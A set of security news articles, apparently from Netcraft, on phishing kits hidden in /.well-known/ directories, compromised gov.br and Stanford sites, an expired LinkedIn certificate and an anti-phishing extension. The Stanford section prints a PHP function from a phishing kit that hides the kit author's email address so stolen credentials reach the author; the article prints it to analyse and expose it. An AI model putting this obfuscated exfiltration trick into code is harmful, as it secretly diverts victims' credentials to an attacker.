The hidden “well-known” phishing sites

Thousands of phishing sites have been finding homes in special hidden directories on compromised web servers.

In the past month alone, over 400 new phishing sites were found hosted within directories named /.well-known/; but rather than being created by fraudsters, these special directories are already present on millions of websites.

A Microsoft Excel Online phishing site hosted in the /.well-known/ directory on a compromised web server. The phishing site piggybacks on the trust instilled by the compromised site's existing SSL certificate, which has not been revoked.

A Microsoft Excel Online phishing site hosted in the /.well-known/ directory on a compromised web server. The phishing site piggybacks on the trust instilled by the compromised site's existing SSL certificate, which has not been revoked.

The /.well-known/ directory acts as a URI path prefix for "well-known locations", as defined by IETF RFC 5785, and provides a way for both humans and automated processes to discover a website's policies and other information.

One of the most common legitimate uses of the /.well-known/ directory is to prove control over a domain. When a secure website uses the Automatic Certificate Management Environment (ACME) protocol to manage its SSL certificate, the issuer will verify ownership by checking for a unique token in /.well-known/acme-challenge/ or /.well-known/pki-validation/. Consequently, most of the phishing attacks that make use of the /.well-known/ directory have been deployed on sites that support HTTPS, using certificates issued by ACME-driven certificate authorities like Let's Encrypt and cPanel.

Due to the success of Let's Encrypt and ACME, millions of websites now have a /.well-known/ directory in their web root, although many website administrators may be oblivious to its presence – particularly if they did not create the directory themselves. The directory can also easily be overlooked, as a bare ls command will treat files or directories that start with a "." as hidden. These factors make /.well-known/ an ideal place to smuggle phish onto a compromised web server.

Around 3% of these phishing sites are mistakenly deployed in a /well-known/ directory, without a leading "." character. This mistake could stem from file system name limitations if the phishing kit was created on a Windows computer. This screenshot shows a phishing kit that would be installed in a /well-known/ directory when unzipped.

Around 3% of these phishing sites are mistakenly deployed in a /well-known/ directory, without a leading "." character. This mistake could stem from file system name limitations if the phishing kit was created on a Windows computer. This screenshot shows a Bank of America phishing kit that would be installed in a /well-known/ directory when unzipped.

Shared hosting platforms are particularly vulnerable to misuse if the file system permissions on the /.well-known/ directories are overly permissive, allowing one website to place content on another customer's website. Some of the individual servers involved in these attacks were hosting "well-known" phishing sites for multiple hostnames, which lends weight to this hypothesis.

Other well-known URIs

In addition to pki-validation and acme-challenge, there are 30 other widely recognised well-known URI suffixes defined by the IETF, W3C and others. For example, the EFF came up with the dnt-policy.txt suffix, which allows websites to announce their compliance with user opt-outs from tracking. The EFF's own Do Not Track Compliance Policy can be viewed at https://www.eff.org/.well-known/dnt-policy.txt.

Where multiple resources may be required, the well-known URI suffix is a directory rather than a file. For example, the IETF's Enrollment over Secure Transport RFC defines a set of resources that can be found under the /.well-known/est/ path.

Despite there being several other well-known URI directory suffixes, only pki-validation and acme-challenge have been used to host recent phishing sites. In fact, more than half of the phishing sites found under the /.well-known/ directory were planted within the subdirectories created by ACME clients (i.e. /.well-known/pki-validation/ and /.well-known/acme-challenge/), possibly making them even less likely to be noticed by the website administrators.

An Alibaba phishing site. More than half of all "well-known" phishing sites are installed in the directories used by ACME clients.

An Alibaba phishing site. More than half of all "well-known" phishing sites are installed in the directories used by ACME clients, although this does not necessarily mean the ACME clients are to blame.

The possible route of compromise is not always apparent in the aforementioned cases, but if there are any glaring security misconfigurations, a proposed new well-known URI suffix, security.txt, could come in handy. By placing contact details and disclosure policies in /.well-known/security.txt, website administrators can make it safer and easier for security researchers to reach out and report any problems they find.

Brazilian government providing warm waters for shoals of phish

Security holes in Brazilian government websites are still rife, with no fewer than eight different gov.br sites being compromised within the past week to host phishing attacks and hacking scripts. The situation does not seem to have improved much since two years ago, when we noticed a similar spate of phishing sites and malware hosted on gov.br domains, with evidence of some sites suffering repeated security compromises.

In one of this week's attacks, a gov.br domain was compromised to such an extent that the fraudsters were able to set up their own custom hostname, which was also configured to use HTTPS. The website, at account-verification-redirect-center.[redacted].gov.br, was then used to host a PayPal phishing site, which is still present at the time of writing.

Despite its rather dubious hostname, Let's Encrypt automatically issued an SSL certificate to account-verification-redirect-center.[redacted].gov.br earlier this week. Such foreseeable misuse evidently still does not prevent certificates being issued to phishing sites; but worse still, the fraudulent certificate has not yet been revoked.

The PayPal phishing site makes use of a ready-made phishing kit provided by SHADOW Z118. It includes several comprehensive "antibots" PHP scripts to avoid detection by search engines and enforcement agencies.

The PayPal phishing site makes use of a ready-made phishing kit provided by SHADOW Z118. It includes several comprehensive "antibots" PHP scripts to avoid detection by search engines and enforcement agencies.

To make matters worse, Netcraft found PHP shells on a few of the recently compromised gov.br sites. These backdoors provide fraudsters with almost complete access to the compromised web servers and make it easy for malware and phishing content to be uploaded at any time.

If the PHP shells are not removed, additional phishing sites are likely to appear on the affected sites, or they could even become infested with other PHP shells that will make the clean-up job much harder: If just one shell is overlooked, it can be used to replace all phishing content, malware and backdoors that the web server administrators had already deleted.

PayPal is still the most commonly targeted organisation in the latest attacks hosted by the Brazilian government, but other targets include Microsoft, Naver, Dropbox and the online dating site Match.com.

This OneDrive phishing site can steal Google, Outlook, AOL, Yahoo, Office 365, and other email credentials. The next form will steal the victim's phone number and backup email address.

This OneDrive phishing site can steal Google, Outlook, AOL, Yahoo, Office 365, and other email credentials. A second form steals the victim's phone number and backup email address.

Some of the phishing sites impersonate Microsoft's OneDrive service, using it as a convenient excuse to target Google, Outlook, AOL, Yahoo and other types of accounts from just a single attack. This particular attack could be rather harmful to businesses, as it gives victims the opportunity to log in with an Organizational Google Apps Account, which could result in the fraudster gaining access to sensitive company secrets.

Ironically, after the victim has been phished, he will be redirected to a PDF file on Google Drive entitled "The Business Owner's Guide to Wealth Management".

Ironically, after the victim has been phished, he will be redirected to a PDF file on Google Drive entitled "The Business Owner's Guide to Wealth Management".

All of the aforementioned phishing attacks were added to Netcraft's Phishing Site Feed, which is used by major web browsers and many leading anti-virus, content-filtering and web hosting companies.

LinkedIn certificate blunder leaves users LockedOut!

Many LinkedIn users were unable to access the professional networking website today after its administrators failed to renew a TLS certificate before it expired.

Image10

The certificate in question was used by various country-specific LinkedIn websites such as https://uk.linkedin.com and https://de.linkedin.com. It expired at midday today, immediately preventing users from accessing the site via these hostnames.

The expired certificate was issued to us.linkedin.com, but was also valid for – and used by – dozens of other country-specific LinkedIn hostnames. The main site at www.linkedin.com was not affected.

The expired certificate was issued to us.linkedin.com, but was also valid for – and used by – dozens of other country-specific LinkedIn hostnames. The main site at www.linkedin.com was not affected.

The sites were still inaccessible a few hours after the problem manifested itself.

The sites were still inaccessible a few hours after the problem manifested itself.

Ironically, LinkedIn's better-than-average security made the expired certificate even more problematic. Most browsers will allow users to ignore certificate validation warnings — however unwise that may be — but the warnings cannot be ignored on these LinkedIn sites.

LinkedIn is in a minority of sites that make use of a security feature called HTTP Strict Transport Security. This feature protects HTTPS sites against trivial man-in-the-middle attacks, but unfortunately in this case, the additional security made the site completely unreachable for regular users.

Good security requires great care: Strict Transport Security is a good idea, but when a certificate expires, users cannot visit the site because browsers will not allow the warnings to be ignored.

Good security requires great care: Strict Transport Security is a good idea, but when a certificate expires, users cannot visit the site because browsers will not allow the warnings to be ignored when an active HSTS policy is in place.

Many modern browsers, such as Firefox and Chrome, simply do not allow users to add an exception when a site has an HSTS policy in place. LinkedIn's HSTS policy has a validity period of 30 days, which means that anyone who has visited the site within the past month would have been unable to add a certificate exception, and would therefore not be able to visit the site until LinkedIn renewed the certificate.

LinkedIn's expired certificate was renewed shortly before this article was published.

Major update to Netcraft Anti-Phishing Extension for Firefox

An update to the Netcraft Anti-Phishing Extension for Mozilla Firefox is now available. This release replaces the Toolbar interface with a modern Button interface to sit alongside the browser's address bar.

firefox-extension-cropped

The upcoming Firefox 57 — to be released on the 14th November — represents a major overhaul of the browser, and removes support for legacy XUL extensions. Future versions of Firefox will only support the new cross-browser WebExtensions API.

The Netcraft Anti-Phishing Extension (known then as the Netcraft Toolbar) was first made available for Internet Explorer in December 2004. A Firefox version followed in May 2005. The current button-style Anti-Phishing Extension was released for Google Chrome and the Opera browser in 2012 and 2013 respectively. The new extension enjoys a 4.5 star rating on the Google Chrome Store.

The Extension runs on any operating system supported by the desktop version of Mozilla Firefox and displays the hosting location, country, longevity, popularity, and an abstracted risk rating for each site visited. In particular its key features are:

  • Protection against phishing sites — The Netcraft anti-phishing community is effectively a giant neighbourhood watch scheme, empowering the most alert and most expert members to defend everyone within the community. As soon as the first recipients of a phishing mail report it, we can block it for all users of the extension providing an additional level of protection from Phishing. Netcraft processes reports of fraudulent URLs from a diverse variety of sources and proactively searches for new fraudulent sites.
  • Detailed site reports — simply click the Netcraft logo to access a wealth of information about the sites you visit, helping you to make informed choices about their safety.
  • Risk Ratings — we evaluate the characteristics of the site compared against those depicted by fraudulent sites. The result is a simple visual summary displayed on the site report.
  • Conveniently report suspected phishing & fraudulent sites — At the click of the button you can report suspected web forgeries to Netcraft, helping to protect the community. Netcraft operates an incentive scheme for Phishing site submissions, including iPads, backpacks, mugs, and more... Over 38.4 million phishing sites have been detected and blocked by Netcraft since the anti-phishing service was launched (November 2017).
  • Protection against cross site scripting (XSS) — The extension optionally traps XSS and other suspicious URLs which contain characters highly likely to deceive.
firefox-blocked-url

The Extension is available for download from the Firefox add-ons page and requires no special administrator privileges to install. Users of the existing Netcraft Anti-Phishing Toolbar will be upgraded automatically to the latest version.

Versions of the Extension are available for other browsers on the Google Chrome Store and Opera add-ons page.

Customised versions with corporate branding and navigation are also available.

First fishy phishing sites sighted

Alliteration aside, Netcraft has found and blocked the first phishing site to be hosted on the homepage of a .fish generic top-level domain (gTLD).

Ripe for crappie puns: A single roe of malicious phishing content hosted on a .fish website.

While a few phishing sites have been found using the .fish and .fishing gTLDs before, parser.fish became the first to host malicious phishing content directly on its homepage. Fraudsters lured unsuspecting suckers to the fishy site, where a cheeky 99-char meta redirect sent them off to a separate phishing site hosted in Vietnam. This then attempted to steal online banking credentials by impersonating the French banking cooperative, BRED.

You didn't need to be a brain sturgeon to mullet over and decide this site smelt a bit fishy.

You didn't need to be a brain sturgeon to mullet over and decide this site smelt a bit fishy.

This is not the first time a fishy top-level domain has been used in a phishing attack, although it is pretty rare. Since the .fish and .fishing gTLDs were delegated to the internet back in 2014, there has been barely a whiff of phishing activity on them. In fact, there hasn't been much legitimate activity, either – Netcraft's top million websites contain only one .fish domain and just a sole .fishing domain, and the entire 1.8 billion site survey contains fewer than 6,000 websites that use a .fish or .fishing domain.

A week before blocking this attack, the parser.fish domain was also home to a Netflix phishing site, but this was hosted in a subdirectory on the site and has since been taken down. The parser.fish domain has been registered through Tucows, using its Contact Privacy domain privacy service to prevent the registrant's details being displayed publicly; but this could just be a red herring and doesn't necessarily mean it was registered with fraudulent intent. The fact that the phishing content has also already been removed from its homepage suggests that the site may simply have been compromised rather than having been created specifically for the porpoise of phishing.

The only other fishy phishes in history have been hosted on legitimate (but now defunct) websites that had also been compromised. Earlier this year, a subdirectory on www.vape.fish was found hosting an ANZ phishing site, while last year a different one was found on www.hot-spot.fishing, which used to sell Russian fishing supplies.

Stanford Uni site infested with hacking tools and phish for months!

Stanford University has unwittingly demonstrated just how bad things can get once a website is compromised by a web shell.

Our story begins on 31 January 2017, when the website of the Paul F. Glenn Center for the Biology of Aging at Stanford University was compromised. Unfortunately, the only people who seemed to notice this at the time were other hackers, who subsequently exploited the compromise to deploy several phishing sites, hacking tools and defacement pages on glennlaboratories.stanford.edu over the following months.

During the January compromise, a hacker placed a rudimentary PHP web shell into the top-level directory of the website. The shell was named wp_conffig.php in an attempt to blend in with the rest of the WordPress software that the site uses. This naming scheme was evidently successful at avoiding detection by Stanford's website administrators, as the PHP shell was still accessible 4 months later:

This rudimentary PHP shell was installed in January and is still on the server at the time of writing. It allows attackers to upload files and execute arbitrary commands on the Stanford web server. No authentication is required, so literally anybody can use this page.

This rudimentary PHP shell was installed in January and was still on the server at the time of writing. It allowed attackers to upload files and execute arbitrary commands on the Stanford web server. No authentication was required, so literally anybody could have used this page.

While WordPress has a bad history with regard to phishing, it is worth pointing out that the Stanford site has been running the latest release of WordPress (4.7.5) since 20 April 2017, and so without further investigation, the original route of compromise is not apparent. However, with an anonymously accessible web shell on the server since January, further compromises were inevitable...

By 14 May 2017, a second web shell had been uploaded to the server. This was based on the WSO (Web Shell by Orb) script, which displays directory listings and offers several other hacking tools that can be used to crack passwords and gain access to databases. Again, the hacker tried to make this web shell harder to notice by calling it config.php.

The second web shell uploaded to the Stanford site has many more features than the first. This one can also be accessed without needing a password. The timestamps next to each file allow a likely timeline of events to be reconstructed.

The second web shell uploaded to the Stanford site has many more features than the first. This one can also be accessed without needing a password. The timestamps next to each file allow a likely timeline of events to be reconstructed.

The WSO shell makes it apparent that the Debian server is not running the latest version of PHP. While there might not have been any unpatched security vulnerabilities that were serious enough to allow compromise, it at least demonstrates a lack of attention to security.

Six minutes later, the hacker uploaded an HTML file named Alarg53.html. This simply displayed the message "Hacked By Alarg53":

The second hacker was keen to claim responsibility for the compromise.

The second hacker was keen to claim responsibility for the compromise.

Similar "Hacked By Alarg53" defacement pages can be found on dozens of other websites, which suggests the hacker is well versed at using web shells to compromise websites.

Several hours later, a hacker – possibly the same one – uploaded two more PHP scripts to the server. The first of these scripts was w3mailer.php, which can be used to send large amounts of spam – ideal for sending lots of phishing emails.

The PHP Emailer SMTP script by Predator. This can be used to send phishing emails from the compromised Stanford University web server.

The PHP Emailer SMTP script by Predator. This can be used to send phishing emails from the compromised Stanford University web server.

Incidentally, the PHP Emailer script contains the following obfuscated JavaScript, which is unwittingly executed whenever the page is accessed by the hacker who uploaded it.

This client-side code in the PHP Mailer script attempts to download and execute a remote JavaScript file. It is obfuscated to keep this fact secret from the hacker who uploaded the script.

This client-side code in the PHP Mailer script attempts to download and execute a remote JavaScript file. It is obfuscated to keep this fact secret from the hacker who uploaded the script.

When the code is de-obfuscated, it can be seen that it causes an externally-hosted JavaScript file to be downloaded; however, the site on which this third-party script is located is currently down. Nonetheless, it illustrates one of the ways in which the authors of these hacking tools can quickly find out where other hackers have deployed them. The author can then monetize the situation by selling the URL of the deployed tool, which will attract new hackers to the compromised server.

The de-obfuscated JavaScript shows how it attempts to load an externally hosted script.

The de-obfuscated JavaScript shows how it attempts to load an externally hosted script.

The other PHP script – promailer.php – was uploaded five minutes later. It provides similar functionality to the previously uploaded script, but does not contain any nefarious JavaScript.

This Pro Mailer V2 script is a safer choice for the hacker, as it does not execute JavaScript from external websites.

This Pro Mailer V2 script is a safer choice for the hacker, as it does not execute JavaScript from external websites.

The following day, an unknown hacker uploaded an archive named 1.zip into the top-level directory of the compromised Stanford website. This archive was unzipped on the server to instantly deploy a Chinese HiNet phishing site, designed to steal webmail credentials from customers of this Chunghwa Telecom internet service.

This may have been the first phishing site to be deployed on the compromised Stanford University website. It redirects victims to the real hinet.net website after it has stolen their credentials. It is possible that other phishing sites existed before this but were deleted by subsequent hackers.

This may have been the first phishing site to be deployed on the compromised Stanford University website. It redirects victims to the real hinet.net website after it has stolen their credentials. It is possible that other phishing sites existed before this but were deleted by subsequent hackers.

A few days later, on 21 May, a new hacker decided to leave his trace on the server by uploading another defacement page called TFS.html. This demonstrates that at least two separate hackers have compromised the server this month alone, possibly by making use of the hacking tools that already existed on it.

Another defacement page uploaded to the Stanford University site by a different hacker.

Another defacement page uploaded to the Stanford University site by a different hacker.

Another HiNet phishing site was also deployed on the compromised server later that day.

After another short lull in fraudulent activity, two more archives were uploaded on 23 May: i.zip and linkedin.zip. These were extracted to multiple locations to create several phishing sites that targeted users of Office365 and LinkedIn.

The Office 365 phishing site. It simply steals a victim's credentials before redirecting them to the real Office365 login page at login.microsoftonline.com.

The Office 365 phishing site. It simply steals a victim's credentials before redirecting them to the real Office365 login page at login.microsoftonline.com.

One of the LinkedIn phishing sites. Like the other phishing sites, it only attempts to steal a victim's username and password before redirecting them to the real site at https://www.linkedin.com/.

One of the LinkedIn phishing sites. Like the other phishing sites, it only attempts to steal a victim's username and password before redirecting them to the real site at https://www.linkedin.com/.

The following day, another archive – KC.zip – was uploaded to the compromised server. This contained a generic phishing kit that is designed to steal a victim's email address and password, without impersonating any particular brand.

The generic phishing site after it had been deployed on the Stanford server.

The generic phishing site after it had been deployed on the Stanford server.

Regardless of what is entered into the above form, the victim will always be told that there was a login error, and that they should go back and try again. This could cause victims to try submitting different username and password combinations, giving the attacker an even greater haul of stolen credentials that might work on other websites. Each time the form is submitted, the victim's email address and password is emailed to a pair of Gmail addresses.

The generic phishing kit is configured to send stolen credentials to the same pair of Gmail addresses as the LinkedIn phishing kit, which obviously suggests that they were uploaded by the same fraudster.

Yet another phishing kit – ileowosun.zip – was uploaded to the server on 27 May. This one impersonated a SunTrust Bank login form, but used a completely different set of email addresses to collect victims' account details. This suggests yet another fraudster could have been responsible for deploying this phishing site.

This convincing SunTrust Bank phishing site was deployed on 27 May, after Netcraft had alerted the Center's director.

This convincing SunTrust Bank phishing site was deployed on 27 May, after Netcraft had alerted the Center's director.

Interestingly, one of the PHP scripts in the SunTrust phishing kit contains the following function, which is rather more dubious than the comment and function name might suggest:

// Function to get country and country sort;
function country_sort(){
    $sorter = "";
    $array = array(114,101,115,117,108,116,98,111,120,49,52,64,103,109,97,105,108,46,99,111,109);
        $count = count($array);
        for ($i = 0; $i < $count; $i++) {
            $sorter .= chr($array[$i]);
        }
    return array($sorter, $GLOBALS['recipient']);
}

The array of integers declared in this function is decoded to yield the email address resultbox14@gmail.com. Phishing kit authors often use tricks like these to hide their own email addresses in their kits. This allows them to receive credentials from all future deployments of the kit, while letting other fraudsters do the hard work of finding compromised servers on which to deploy the kits. By disguising the author's "secret" email address within a legitimate-looking function, most fraudsters who deploy the kit are unlikely to delete or alter the nefarious code.

Interestingly, the KC.zip and ileowosun.zip phishing kits – as well as the directories they were unzipped into – were deleted from the server around 29 May. It is not clear who did this, but no other phishing kits or hacking tools were removed, which puts the finger of suspicion on a rival fraudster.

When a compromised server has become so infested with hacking tools and phishing kits, one ironic side effect is that other fraudsters may subsequently come along and remove the existing phishing content, thus protecting some potential victims. But of course, the general trend is for more kits to be deployed on the server, and indeed, also on 29 May, a second SunTrust phishing kit was uploaded.

What went wrong?

A single Stanford University website has ended up hosting several hacking tools that have likely been used by multiple hackers to deploy a similar number of phishing sites onto the server. Failing to notice and remove the hacking tools could well have compounded the problem by facilitating the more recent compromises.

Hosting providers – including universities – can receive an alerting service from Netcraft which will notify them whenever phishing, malware, or web shells are detected on their infrastructure. Organisations targeted by high volume phishing administered via web shells may trial Netcraft's Countermeasures service.

Note: Publication of this article was delayed until Stanford University had removed the aforementioned hacking tool scripts from the website.